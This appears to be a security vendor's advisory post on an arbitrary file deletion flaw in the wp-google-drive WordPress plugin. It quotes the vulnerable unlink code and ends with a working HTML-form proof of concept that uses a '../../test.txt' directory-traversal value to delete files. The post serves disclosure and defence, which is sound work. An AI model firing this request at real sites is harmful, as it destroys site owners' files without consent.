From time to time a vulnerability in a plugin is disclosed without the discoverer putting out a complete report on the vulnerability and we will put out a post detailing the vulnerability so that we can provide our customers with more complete information on the vulnerability.
One of the problems that we find with reports of claimed vulnerabilities in WordPress plugins is that in some instances you have reports that involve real vulnerabilities where the information provided is incomplete or inaccurate. Both of those came up with what turns out to be a report by Lenon Leite of an arbitrary file deletion vulnerability in the plugin Google Drive for WordPress (wp-google-drive). For a reason we don’t quite understand it was labeled as a remote code execution (RCE) vulnerability in the report.
In a post on the website of the discoverer of that vulnerability they go in to more detail in to arbitrary file deletion vulnerabilities and reference is again made to RCE without explanation to why they are lumping arbitrary file deletion in with RCE. That post also includes another claim we don’t understand:
At the end of November I noticed a file-handling function in PHP that was going unnoticed by developers, perhaps because it seemed harmless. The function in question is unlink, which, for those who do not know, works to delete a file in the filesystem.
It is common to worry about file upload features, even those that read. Unfortunately, they forget the deletion.
There have been plenty of security issue related to file uploads and the fact that some developers have not properly secured file deletion capability doesn’t mean it goes unnoticed by developers. We already have a number of file deletion vulnerabilities in our data set, some of them that we discovered, so it isn’t like this is a previously unknown type of issue either.
In any case, the arbitrary file deletion vulnerability in the file /gdrive-ajaxs.php, where a switch statement has its case specified by the POST input “ajaxstype”:
When that POST input is set to “del_fl_bkp” the following code runs:
17 18 19 20 21 22 23
case 'del_fl_bkp': gd_delete_listById($_POST['id']); $dir = GBACKUP_PLUGIN_BACKUPFOLDER_PATH."/".$_POST['file_name']; @unlink( $dir ); $dbkp = new settings_option; $dbkp->file_manage_list(); break;
That will unlink (delete) a file specified in part specified by the POST input “file_name”. Through the usage of directory traversal, files outside of the intended directory, /wp-content/backup/, can be deleted.
Proof of Concept
The following proof of concept will cause a file named test.txt in the root directory of the WordPress installation to be deleted.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html> <body> <form action="http://[path to WordPress]/wp-content/plugins/wp-google-drive/gdrive-ajaxs.php" method="POST"> <input type="hidden" name="ajaxstype" value="del_fl_bkp" /> <input type="hidden" name="file_name" value="../../test.txt" /> <input type="submit" value="Submit" /> </form> </body>